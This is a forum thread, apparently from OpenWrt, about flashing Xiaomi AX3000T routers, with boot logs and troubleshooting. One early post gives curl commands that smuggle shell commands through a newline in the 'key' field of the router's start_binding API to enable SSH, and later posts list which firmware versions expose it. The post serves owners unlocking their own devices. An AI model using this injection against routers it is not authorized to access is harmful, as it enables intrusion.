I don't go there... I don't have time to read the same questions and answers in different variations on every page.
is immortalwrt has a better wifi driver?
Looks like a new SSH exploit was discovered ~ 5 days ago, or at least became public. 
Here are the cURL commands to exploit the detected vulnerability (should be suitable for both RD23 and RD03):
cURL commands from cuim.cn site:
click to see
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=xxx/api/xqsystem/start_binding -d "uid=1234&key=1234'%0Anvram%20set%20ssh_en%3D1'"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=xxx/api/xqsystem/start_binding -d "uid=1234&key=1234'%0Anvram%20commit'"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=xxx/api/xqsystem/start_binding -d "uid=1234&key=1234'%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear'"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=xxx/api/xqsystem/start_binding -d "uid=1234&key=1234'%0A%2Fetc%2Finit.d%2Fdropbear%20start'"
3 Likes
I did as they wrote in the link. I am really in initramfs. sysupgrade now gives this error after installation
Error
Starting kernel ...
[ 0.000000] Booting Linux on physical CPU 0x0000000000 [0x410fd034]
[ 0.000000] Linux version 6.6.50 (builder@buildhost) (aarch64-openwrt-linux-musl-gcc (OpenWrt GCC 13.3.0 r27346-c7ba5574f5) 13.3.0, GNU ld (GNU Binutils) 2.42) #0 SMP Tue Sep 10 22:37:34 2024
[ 0.000000] Machine model: Xiaomi Mi Router AX3000T
[ 0.000000] OF: reserved mem: 0x0000000042ff0000..0x0000000042ffffff (64 KiB) map non-reusable ramoops@42ff0000
[ 0.000000] OF: reserved mem: 0x0000000043000000..0x000000004302ffff (192 KiB) nomap non-reusable secmon@43000000
[ 0.000000] OF: reserved mem: 0x0000000047c80000..0x0000000047d7ffff (1024 KiB) nomap non-reusable wmcpu-reserved@47c80000
[ 0.000000] OF: reserved mem: 0x0000000047d80000..0x0000000047dbffff (256 KiB) nomap non-reusable wo-emi@47d80000
[ 0.000000] OF: reserved mem: 0x0000000047dc0000..0x0000000047ffffff (2304 KiB) nomap non-reusable wo-data@47dc0000
[ 0.000000] Zone ranges:
[ 0.000000] DMA [mem 0x0000000040000000-0x000000004fffffff]
[ 0.000000] DMA32 empty
[ 0.000000] Normal empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000040000000-0x0000000042ffffff]
[ 0.000000] node 0: [mem 0x0000000043000000-0x000000004302ffff]
[ 0.000000] node 0: [mem 0x0000000043030000-0x0000000047c7ffff]
[ 0.000000] node 0: [mem 0x0000000047c80000-0x0000000047ffffff]
[ 0.000000] node 0: [mem 0x0000000048000000-0x000000004fffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000040000000-0x000000004fffffff]
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv1.1 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: MIGRATE_INFO_TYPE not supported.
[ 0.000000] psci: SMC Calling Convention v1.2
[ 0.000000] percpu: Embedded 18 pages/cpu s35112 r8192 d30424 u73728
[ 0.000000] pcpu-alloc: s35112 r8192 d30424 u73728 alloc=18*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] Detected VIPT I-cache on CPU0
[ 0.000000] CPU features: detected: GIC system register CPU interface
[ 0.000000] CPU features: kernel page table isolation disabled by kernel configuration
[ 0.000000] alternatives: applying boot alternatives
[ 0.000000] Kernel command line: console=ttyS0,115200n1 loglevel=8 swiotlb=512 rootfstype=squashfs firmware=0 mtd=ubi uart_en=1
[ 0.000000] Unknown kernel command line parameters "firmware=0 mtd=ubi uart_en=1", will be passed to user space.
[ 0.000000] Dentry cache hash table entries: 32768 (order: 6, 262144 bytes, linear)
[ 0.000000] Inode-cache hash table entries: 16384 (order: 5, 131072 bytes, linear)
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 64512
[ 0.000000] mem auto-init: stack:off, heap alloc:off, heap free:off
[ 0.000000] software IO TLB: area num 2.
[ 0.000000] software IO TLB: mapped [mem 0x000000004f900000-0x000000004fa00000] (1MB)
[ 0.000000] Memory: 238724K/262144K available (8896K kernel code, 902K rwdata, 2588K rodata, 448K init, 302K bss, 23420K reserved, 0K cma-reserved)
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] rcu: Hierarchical RCU implementation.
[ 0.000000] rcu: RCU restricting CPUs from NR_CPUS=4 to nr_cpu_ids=2.
[ 0.000000] Tracing variant of Tasks RCU enabled.
[ 0.000000] rcu: RCU calculated value of scheduler-enlistment delay is 10 jiffies.
[ 0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS: 64, nr_irqs: 64, preallocated irqs: 0
[ 0.000000] GICv3: GIC: Using split EOI/Deactivate mode
[ 0.000000] GICv3: 640 SPIs implemented
[ 0.000000] GICv3: 0 Extended SPIs implemented
[ 0.000000] Root IRQ handler: gic_handle_irq
[ 0.000000] GICv3: GICv3 features: 16 PPIs
[ 0.000000] GICv3: CPU0: found redistributor 0 region 0:0x000000000c080000
[ 0.000000] rcu: srcu_init: Setting srcu_struct sizes based on contention.
[ 0.000000] arch_timer: cp15 timer(s) running at 13.00MHz (phys).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x2ff89eacb, max_idle_ns: 440795202429 ns
[ 0.000000] sched_clock: 56 bits at 13MHz, resolution 76ns, wraps every 4398046511101ns
[ 0.000074] Calibrating delay loop (skipped), value calculated using timer frequency.. 26.00 BogoMIPS (lpj=130000)
[ 0.000083] pid_max: default: 32768 minimum: 301
[ 0.002991] Mount-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.002999] Mountpoint-cache hash table entries: 512 (order: 0, 4096 bytes, linear)
[ 0.005165] cacheinfo: Unable to detect cache hierarchy for CPU 0
[ 0.005708] RCU Tasks Trace: Setting shift to 1 and lim to 1 rcu_task_cb_adjust=1.
[ 0.005851] rcu: Hierarchical SRCU implementation.
[ 0.005853] rcu: Max phase no-delay instances is 1000.
[ 0.006262] smp: Bringing up secondary CPUs ...
[ 0.006631] Detected VIPT I-cache on CPU1
[ 0.006675] GICv3: CPU1: found redistributor 1 region 0:0x000000000c0a0000
[ 0.006706] CPU1: Booted secondary processor 0x0000000001 [0x410fd034]
[ 0.006775] smp: Brought up 1 node, 2 CPUs
[ 0.006781] SMP: Total of 2 processors activated.
[ 0.006784] CPU features: detected: 32-bit EL0 Support
[ 0.006787] CPU features: detected: CRC32 instructions
[ 0.006820] CPU features: emulated: Privileged Access Never (PAN) using TTBR0_EL1 switching
[ 0.006823] CPU: All CPU(s) started at EL2
[ 0.006825] alternatives: applying system-wide alternatives
[ 0.010524] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.010542] futex hash table entries: 512 (order: 3, 32768 bytes, linear)
[ 0.011794] pinctrl core: initialized pinctrl subsystem
[ 0.012899] NET: Registered PF_NETLINK/PF_ROUTE protocol family
[ 0.013517] DMA: preallocated 128 KiB GFP_KERNEL pool for atomic allocations
[ 0.013545] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA pool for atomic allocations
[ 0.013566] DMA: preallocated 128 KiB GFP_KERNEL|GFP_DMA32 pool for atomic allocations
[ 0.013934] thermal_sys: Registered thermal governor 'fair_share'
[ 0.013938] thermal_sys: Registered thermal governor 'bang_bang'
[ 0.013941] thermal_sys: Registered thermal governor 'step_wise'
[ 0.013943] thermal_sys: Registered thermal governor 'user_space'
[ 0.014049] ASID allocator initialised with 65536 entries
[ 0.015085] pstore: Using crash dump compression: deflate
[ 0.015091] pstore: Registered ramoops as persistent store backend
[ 0.015094] ramoops: using 0x10000@0x42ff0000, ecc: 0
[ 0.022186] Modules: 29456 pages in range for non-PLT usage
[ 0.022195] Modules: 520976 pages in range for PLT usage
[ 0.023023] cryptd: max_cpu_qlen set to 1000
[ 0.024157] SCSI subsystem initialized
[ 0.024361] libata version 3.00 loaded.
[ 0.025940] clocksource: Switched to clocksource arch_sys_counter
[ 0.028228] NET: Registered PF_INET protocol family
[ 0.028334] IP idents hash table entries: 4096 (order: 3, 32768 bytes, linear)
[ 0.029588] tcp_listen_portaddr_hash hash table entries: 256 (order: 0, 4096 bytes, linear)
[ 0.029603] Table-perturb hash table entries: 65536 (order: 6, 262144 bytes, linear)
[ 0.029612] TCP established hash table entries: 2048 (order: 2, 16384 bytes, linear)
[ 0.029629] TCP bind hash table entries: 2048 (order: 4, 65536 bytes, linear)
[ 0.029680] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.029756] UDP hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.029780] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear)
[ 0.030125] NET: Registered PF_UNIX/PF_LOCAL protocol family
[ 0.030156] PCI: CLS 0 bytes, default 64
[ 0.031535] workingset: timestamp_bits=46 max_order=16 bucket_order=0
[ 0.036327] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.036334] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.069365] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 0.079959] Serial: 8250/16550 driver, 16 ports, IRQ sharing enabled
[ 0.083690] printk: console [ttyS0] disabled
[ 0.104090] 11002000.serial: ttyS0 at MMIO 0x11002000 (irq = 72, base_baud = 2500000) is a ST16650V2
[ 0.104132] printk: console [ttyS0] enabled
[ 0.853106] loop: module loaded
[ 0.858247] spi-nand spi0.0: ESMT SPI NAND was found.
[ 0.863299] spi-nand spi0.0: 128 MiB, block size: 128 KiB, page size: 2048, OOB size: 64
[ 0.871994] Signature found at block 1023 [0x07fe0000]
[ 0.877155] NMBM management region starts at block 960 [0x07800000]
[ 0.884328] First info table with writecount 0 found in block 960
[ 0.893222] Second info table with writecount 0 found in block 963
[ 0.899404] NMBM has been successfully attached
[ 0.904242] 10 fixed-partitions partitions found on MTD device spi0.0
[ 0.910707] Creating 10 MTD partitions on "spi0.0":
[ 0.915575] 0x000000000000-0x000000100000 : "BL2"
[ 0.921218] 0x000000100000-0x000000140000 : "Nvram"
[ 0.926702] 0x000000140000-0x000000180000 : "Bdata"
[ 0.932181] 0x000000180000-0x000000380000 : "Factory"
[ 0.938974] 0x000000380000-0x000000580000 : "FIP"
[ 0.945117] 0x000000580000-0x0000005c0000 : "crash"
[ 0.950643] 0x0000005c0000-0x000000600000 : "crash_log"
[ 0.956508] 0x000007600000-0x000007640000 : "KF"
[ 0.961743] 0x000000600000-0x000002800000 : "ubi_kernel"
[ 0.984404] 0x000002800000-0x000007600000 : "ubi"
[ 1.173063] mtk_soc_eth 15100000.ethernet eth0: mediatek frame engine at 0xffffffc081700000, irq 75
[ 1.182799] i2c_dev: i2c /dev entries driver
[ 1.189759] mtk-wdt 1001c000.watchdog: Watchdog enabled (timeout=31 sec, nowayout=0)
[ 1.198841] NET: Registered PF_INET6 protocol family
[ 1.204735] Segment Routing with IPv6
[ 1.208465] In-situ OAM (IOAM) with IPv6
[ 1.212439] NET: Registered PF_PACKET protocol family
[ 1.217548] bridge: filtering via arp/ip/ip6tables is no longer available by default. Update your scripts to load br_netfilter if you need this.
[ 1.230837] 8021q: 802.1Q VLAN Support v1.8
[ 1.330573] mt7530-mdio mdio-bus:1f: configuring for fixed/2500base-x link mode
[ 1.339328] mt7530-mdio mdio-bus:1f: Link is Up - 2.5Gbps/Full - flow control rx/tx
[ 1.350334] mt7530-mdio mdio-bus:1f wan (uninitialized): PHY [mt7530-0:00] driver [MediaTek MT7531 PHY] (irq=80)
[ 1.372559] mt7530-mdio mdio-bus:1f lan2 (uninitialized): PHY [mt7530-0:01] driver [MediaTek MT7531 PHY] (irq=81)
[ 1.394673] mt7530-mdio mdio-bus:1f lan3 (uninitialized): PHY [mt7530-0:02] driver [MediaTek MT7531 PHY] (irq=82)
[ 1.416770] mt7530-mdio mdio-bus:1f lan4 (uninitialized): PHY [mt7530-0:03] driver [MediaTek MT7531 PHY] (irq=83)
[ 1.428360] mtk_soc_eth 15100000.ethernet eth0: entered promiscuous mode
[ 1.435104] DSA: tree 0 setup
[ 1.438730] UBI: auto-attach mtd9
[ 1.442054] ubi0: default fastmap pool size: 30
[ 1.446590] ubi0: default fastmap WL pool size: 15
[ 1.451368] ubi0: attaching mtd9
[ 1.718429] ubi0: scanning is finished
[ 1.727932] ubi0: attached mtd9 (name "ubi", size 78 MiB)
[ 1.733339] ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
[ 1.740214] ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048
[ 1.746996] ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096
[ 1.753943] ubi0: good PEBs: 624, bad PEBs: 0, corrupted PEBs: 0
[ 1.759940] ubi0: user volume: 2, internal volumes: 1, max. volumes count: 128
[ 1.767150] ubi0: max/mean erase counter: 3/2, WL threshold: 4096, image sequence number: 1244515590
[ 1.776270] ubi0: available PEBs: 0, total reserved PEBs: 624, PEBs reserved for bad PEB handling: 19
[ 1.785483] ubi0: background thread "ubi_bgt0d" started, PID 617
[ 1.785991] block ubiblock0_0: created from ubi0:0(rootfs)
[ 1.796963] ubiblock: device ubiblock0_0 (rootfs) set to be root filesystem
[ 1.804012] clk: Disabling unused clocks
[ 1.808992] List of all partitions:
[ 1.812491] 1f00 1024 mtdblock0
[ 1.812496] (driver?)
[ 1.819029] 1f01 256 mtdblock1
[ 1.819034] (driver?)
[ 1.825549] 1f02 256 mtdblock2
[ 1.825553] (driver?)
[ 1.832074] 1f03 2048 mtdblock3
[ 1.832078] (driver?)
[ 1.838597] 1f04 2048 mtdblock4
[ 1.838601] (driver?)
[ 1.845117] 1f05 256 mtdblock5
[ 1.845121] (driver?)
[ 1.851641] 1f06 256 mtdblock6
[ 1.851645] (driver?)
[ 1.858168] 1f07 256 mtdblock7
[ 1.858173] (driver?)
[ 1.864687] 1f08 34816 mtdblock8
[ 1.864691] (driver?)
[ 1.871211] 1f09 79872 mtdblock9
[ 1.871215] (driver?)
[ 1.877733] fe00 4340 ubiblock0_0
[ 1.877737] (driver?)
[ 1.884424] No filesystem could mount root, tried:
[ 1.884426] squashfs
[ 1.889292]
[ 1.893033] Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(254,0)
[ 1.901452] SMP: stopping secondary CPUs
[ 1.905364] Kernel Offset: disabled
[ 1.908838] CPU features: 0x0,00000000,00000000,1000400b
[ 1.914137] Memory Limit: none
[ 1.919504] pstore: backend (ramoops) writing error (-28)
[ 1.924891] Rebooting in 1 seconds..
I'm sorry that you need to proceed with the UART method for your RD23. Now, new RD23 users are able to use the new exploit method for OpenWrt installation and even back up the original partitions like RD03 users once SSH access is obtained.
As an alternative suggestion for your case, after step 8 is completed and you are in the OpenWrt initramfs system, please try installing Luci and performing the sysupgrade via the Luci interface instead of steps 10 and 11.
Ive never tested Immortal, but other people are happy with speed, compatibility and stability
I now have SSH Access to my RD03 with Firmware 1.0.84.
Could you please explain what are the next steps to install immortalwrt with AN8855 driver? OpenWRT/Linux is new to me. Thank you in advance.
Immortalwrt is not Openwrt and is therefore off topic for this forum.
Raise any questions about non-Openwrt firmwares via that firmwares support channel.
Sorry, let me just confirm, ImmortalWRT's images from September 6th (the latest I can see) contain the AN8855 drivers that make it compatible with the new hardware revision of the router (1.0.84)?
It appears you are using firmware that is not from the official OpenWrt project.
When using forks/offshoots/vendor-specific builds that are "based on OpenWrt", there may be many differences compared to the official versions (hosted by OpenWrt.org). Some of these customizations may fundamentally change the way that OpenWrt works. You might need help from people with specific/specialized knowledge about the firmware you are using, so it is possible that advice you get here may not be useful.
You may find that the best options are:
- Install an official version of OpenWrt, if your device is supported (see https://firmware-selector.openwrt.org).
- Ask for help from the maintainer(s) or user community of the specific firmware that you are using.
- Provide the source code for the firmware so that users on this forum can understand how your firmware works (OpenWrt forum users are volunteers, so somebody might look at the code if they have time and are interested in your issue).
If you believe that this specific issue is common to generic/official OpenWrt and/or the maintainers of your build have indicated as such, please feel free to clarify.
When flashing the file openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-ubootmod-bl31-uboot.fip
the power went out. After the power was restored, the router does not respond to anything, the LED does not light, there is no reaction to pressing "reset". When viewing the properties of the computer's network adapter, there is not a single packet for either reception or transmission, but the network interface changes the connection speed from 1000 to 100 megabits both there and back.
Does it make sense to try to disassemble the router and connect the UART for recovery, or not? Now only unsoldering the flash and directly filling the DAMP (mtd1_BL2.bin, mtd5_FIP.bin, ubi.bin) is available.
The file openwrt-mediatek-filogic-xiaomi_mi-router-ax3000t-ubootmod-preloader.bin was preloaded successfully (theoretically)
Yes, as mentioned here:
Hi all,
I'm having some trouble with my AX3000T, basically followed all the instructions to XMiR-Patcher and got to step 7 (install firmware which I used openwrt-23.05.4-mediatek-filogic-xiaomi_mi-router-ax3000t-ubootmod-initramfs-factory). After successfully installing the firmware and waiting for 40-70 seconds I try to browse 192.168.1.1, no go.
My laptop connected to the router via LAN cable (not the first port) gives me a 169.254.157.33 IP address, the light on the machine stays on amber.
Have I bricked my machine and how do I fix it?
This method, which allows to get SSH access on any AX3000T with stock firmware, was discovered and publicly published on September 6, 2024.
Added this new method to the Wiki:
Feel free to review and adjust if something is inaccurate.
1.0.47 (CN) not have method "xqsystem/start_binding", but have "misystem/arn_switch"
1.0.64 (CN) have method "xqsystem/start_binding"
1.0.84 (CN) have method "xqsystem/start_binding"
1.0.31 (INT) I don't know
thank you. I will add this clarifications to the wiki.
update: added.
it has
1 Like
I cannot get wifi to work on any of the snapshot builds for the life of me. Anyone has any luck there? RD23 variant.
Hello, I've encountered a nasty issue while trying to setup OpenWRT on my Chinese AX3000T: I can't ssh into OpenWRT's default IP address. No matter what I do, it's always "Connection timed out".
So, I have a normal "main router" up and running. My PC is connected to it via Ethernet and my laptop is connected to it via Wi-Fi. AX3000T is plugged in as LAN (yes, I picked one of the middle slots). I don't have LuCI installed yet.
The router is accessible when I connect it right into my PC, but it doesn't play well with my (main) router's local network. I've managed to somehow ssh into OpenWRT via Wi-Fi after I unplugged Ethernet from my PC (internet connection didn't work for a while when I plugged the cable back in, so didn't work the main router's Wi-Fi network), but I couldn't connect to it when I came back to my PC and laptop.
What might be happening here? Are there any guides I could consult? It's a frustrating roadblock, especially so given how the flashing process went smoothly...
What are you trying to achieve by connecting the LAN port of your OpenWrt router to the LAN port of your main router?
- Dumb Access Point in the same subnet extending WiFi coverage?
- Separate sub-network? What about just plug WAN port of your OWT router to the LAN port of your main router and access OWT router via Wi-Fi?
Please review the links above, and if you have a new questions for Lan setup, please create a separate topic as it does not relate to the AX3000T but rather to network configuration.
What was the firmware version of the router you flashed?